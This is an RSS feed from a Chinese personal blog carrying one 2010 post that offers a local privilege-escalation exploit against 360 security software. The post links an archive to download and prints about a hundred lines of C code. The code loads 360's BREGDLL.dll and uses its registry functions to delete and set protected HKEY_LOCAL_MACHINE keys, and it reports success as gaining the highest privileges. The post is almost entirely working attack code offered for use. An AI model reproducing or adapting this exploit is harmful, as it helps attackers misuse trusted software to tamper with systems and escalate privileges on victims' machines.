<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>赵健在这里！&#124; www.zhaojian.net &#187; 360漏洞利用工具</title>
	<atom:link href="http://www.zhaojian.net/tag/360%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8%e5%b7%a5%e5%85%b7/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.zhaojian.net</link>
	<description>赵健在这里！- 关注生活，专注互联网。www.zhaojian.net</description>
	<lastBuildDate>Tue, 08 May 2012 23:17:19 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>360本地提权漏洞演示+利用工具 EXP</title>
		<link>http://www.zhaojian.net/360ben-di-ti-quan-lou-dong-yan-shi-li-yong-gong-ju-exp/</link>
		<comments>http://www.zhaojian.net/360ben-di-ti-quan-lou-dong-yan-shi-li-yong-gong-ju-exp/#comments</comments>
		<pubDate>Wed, 03 Feb 2010 09:16:34 +0000</pubDate>
		<dc:creator>赵健</dc:creator>
				<category><![CDATA[电脑网络]]></category>
		<category><![CDATA[360]]></category>
		<category><![CDATA[360入侵]]></category>
		<category><![CDATA[360本地提权漏洞]]></category>
		<category><![CDATA[360漏洞利用工具]]></category>
		<category><![CDATA[360漏洞工具]]></category>
		<category><![CDATA[exp]]></category>

		<guid isPermaLink="false">http://www.zhaojian.net/?p=641</guid>
		<description><![CDATA[漏洞演示地址已失效 工具下载地址： 下载地址 代码： 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101#include typedef BOOL (WINAPI *INIT_REG_ENGINE)(); typedef LONG (WINAPI *BREG_Delete_KEY)(HKEY hKey, LPCSTR lpSubKey); typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult); typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey); typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData); BREG_Delete_KEY BRegDeleteKey = NULL; BREG_OPEN_KEY BRegOpenKey = NULL; BREG_CLOSE_KEY [...]]]></description>
			<content:encoded><![CDATA[<p><span style="text-decoration: line-through;">漏洞演示地址已失效</span></p>
<p>工具下载地址：</p>
<p><a title="赵健" href="http://down.hacker.com.cn/1002/360up.rar" target="_self">下载地址</a></p>
<p>代码：</p>
<div class="codecolorer-container text mac-classic" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;height:500px;"><table cellspacing="0" cellpadding="0"><tbody><tr><td style="padding:5px;text-align:center;color:#888888;background-color:#EEEEEE;border-right: 1px solid #9F9F9F;font: normal 12px/1.4em Monaco, Lucida Console, monospace;"><div>1<br />2<br />3<br />4<br />5<br />6<br />7<br />8<br />9<br />10<br />11<br />12<br />13<br />14<br />15<br />16<br />17<br />18<br />19<br />20<br />21<br />22<br />23<br />24<br />25<br />26<br />27<br />28<br />29<br />30<br />31<br />32<br />33<br />34<br />35<br />36<br />37<br />38<br />39<br />40<br />41<br />42<br />43<br />44<br />45<br />46<br />47<br />48<br />49<br />50<br />51<br />52<br />53<br />54<br />55<br />56<br />57<br />58<br />59<br />60<br />61<br />62<br />63<br />64<br />65<br />66<br />67<br />68<br />69<br />70<br />71<br />72<br />73<br />74<br />75<br />76<br />77<br />78<br />79<br />80<br />81<br />82<br />83<br />84<br />85<br />86<br />87<br />88<br />89<br />90<br />91<br />92<br />93<br />94<br />95<br />96<br />97<br />98<br />99<br />100<br />101<br /></div></td><td><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">#include<br />
typedef BOOL (WINAPI *INIT_REG_ENGINE)();<br />
typedef LONG (WINAPI *BREG_Delete_KEY)(HKEY hKey, LPCSTR lpSubKey);<br />
typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);<br />
typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);<br />
typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);<br />
<br />
BREG_Delete_KEY BRegDeleteKey = NULL;<br />
BREG_OPEN_KEY BRegOpenKey = NULL;<br />
BREG_CLOSE_KEY BRegCloseKey = NULL;<br />
REG_SET_VALUE_EX BRegSetValueEx = NULL;<br />
<br />
#define AppPath &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&quot;Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe&quot;<br />
<br />
#define TestDeleteKey &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HKEY_LOCAL_MACHINE<br />
#define TestDeleteRegPath &nbsp; &nbsp;&quot;Software\\360Safe\\Update&quot;<br />
<br />
#define TestSetKey &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HKEY_LOCAL_MACHINE<br />
#define TestSetPath &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&quot;Software\\360Safe&quot;<br />
<br />
BOOL InitBRegDll()<br />
{<br />
LONG lResult;<br />
HKEY hKey;<br />
<br />
CHAR cPath[MAX_PATH + 32] = { 0 };<br />
DWORD dwPathLen = MAX_PATH;<br />
<br />
lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &amp;amp;hKey);<br />
if (FAILED(lResult))<br />
return FALSE;<br />
<br />
DWORD dwType = REG_SZ;<br />
lResult = RegQueryValueExA(hKey, &quot;Path&quot;, NULL, &amp;amp;dwType, (LPBYTE)cPath, &amp;amp;dwPathLen);<br />
RegCloseKey(hKey);<br />
if (FAILED(lResult))<br />
return FALSE;<br />
<br />
strcat(cPath, &quot;\\deepscan\\BREGDLL.dll&quot;);<br />
<br />
HMODULE modBReg = LoadLibraryA(cPath);<br />
if (!modBReg)<br />
return FALSE;<br />
<br />
INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, &quot;InitRegEngine&quot;);<br />
BRegDeleteKey = (BREG_Delete_KEY)GetProcAddress(modBReg, &quot;BRegDeleteKey&quot;);<br />
BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, &quot;BRegOpenKey&quot;);<br />
BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, &quot;BRegCloseKey&quot;);<br />
BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, &quot;BRegSetValueEx&quot;);<br />
<br />
if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {<br />
FreeLibrary(modBReg);<br />
return FALSE;<br />
}<br />
<br />
if (!InitRegEngine()) {<br />
FreeLibrary(modBReg);<br />
return FALSE;<br />
}<br />
<br />
return TRUE;<br />
}<br />
<br />
LONG TestSetRegKey()<br />
{<br />
HKEY hKey;<br />
LONG lResult;<br />
<br />
lResult = BRegOpenKey(TestSetKey, TestSetPath, &amp;amp;hKey);<br />
if (FAILED(lResult))<br />
return lResult;<br />
<br />
DWORD dwType = REG_SZ;<br />
static char szData[] = &quot;TEST VALUE&quot;;<br />
lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&amp;amp;szData, (DWORD)sizeof(szData));<br />
BRegCloseKey(hKey);<br />
<br />
return lResult;<br />
}<br />
<br />
int main(int argc, char *argv[])<br />
{<br />
if (!InitBRegDll()) {<br />
MessageBoxA(NULL, &quot;初始化BReg失败!&quot;, &quot;失败&quot;, MB_ICONSTOP);<br />
return 1;<br />
<br />
}<br />
if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {<br />
MessageBoxA(NULL, &quot;键值删除失败!&quot;, &quot;失败&quot;, MB_ICONSTOP);<br />
return 2;<br />
<br />
}<br />
<br />
if (FAILED(TestSetRegKey())) {<br />
MessageBoxA(NULL, &quot;设置键值失败!&quot;, &quot;失败&quot;, MB_ICONSTOP);<br />
return 3;<br />
}<br />
<br />
MessageBoxA(NULL, &quot;突破系统安全检查，获得最高权限，漏洞利用成功!&quot;, &quot;成功&quot;, MB_OK);<br />
return 0;<br />
}</div></td></tr></tbody></table></div>

	标签：<a href="http://www.zhaojian.net/tag/360/" title="360" rel="tag">360</a>, <a href="http://www.zhaojian.net/tag/360%e5%85%a5%e4%be%b5/" title="360入侵" rel="tag">360入侵</a>, <a href="http://www.zhaojian.net/tag/360%e6%9c%ac%e5%9c%b0%e6%8f%90%e6%9d%83%e6%bc%8f%e6%b4%9e/" title="360本地提权漏洞" rel="tag">360本地提权漏洞</a>, <a href="http://www.zhaojian.net/tag/360%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8%e5%b7%a5%e5%85%b7/" title="360漏洞利用工具" rel="tag">360漏洞利用工具</a>, <a href="http://www.zhaojian.net/tag/360%e6%bc%8f%e6%b4%9e%e5%b7%a5%e5%85%b7/" title="360漏洞工具" rel="tag">360漏洞工具</a>, <a href="http://www.zhaojian.net/tag/exp/" title="exp" rel="tag">exp</a><br />
]]></content:encoded>
			<wfw:commentRss>http://www.zhaojian.net/360ben-di-ti-quan-lou-dong-yan-shi-li-yong-gong-ju-exp/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

